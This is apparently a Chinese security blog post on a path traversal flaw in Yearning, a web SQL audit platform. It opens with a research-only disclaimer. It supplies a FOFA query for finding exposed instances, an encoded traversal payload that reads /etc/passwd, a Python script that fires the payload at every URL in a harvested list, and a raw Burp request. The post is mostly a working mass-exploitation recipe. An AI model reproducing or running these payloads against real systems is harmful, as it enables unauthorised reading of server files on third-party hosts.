免责声明：该站所分享的安全知识仅供安全研究和学习之用，如用于其他用途，产生一切后果由使用者承担全部法律及连带责任，与工具作者和本站无关！

Yearning介绍：Yearning是基于Inception的可视化web端sql审核平台，Yearning SQL审计平台基于Vue.js与Django的整套sql审核平台解决方案，提供基于Inception的SQL检测及执行。

Fofa资产绘测：app=”Yearning”

步骤：使用fofa获取符合条件的URL保存为文档urls.txt，编写简单python脚本先跑出成功访问状态码，随后结合Burp放包验证，也可直接访问脚本状态为200的URL链接。

POC：/front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

代码：复现所用python脚本与Burp代码（若Burp复现失败可直接打开脚本跑出的URL链接）

import requests

with open('urls.txt', 'r', encoding='utf-8')as niuma:
    for url in niuma:
        try:
            url1 = url.strip()
            url1 = url1 + '/front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd'
            print(url1)
            headers = {
                'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
                'Accept': '*/*',
                'Connection': 'Keep-Alive'
            }
            r = requests.get(url=url1, headers=headers, verify=False)
            print(r.status_code)
        except Exception as e:
            print('网络问题')

GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive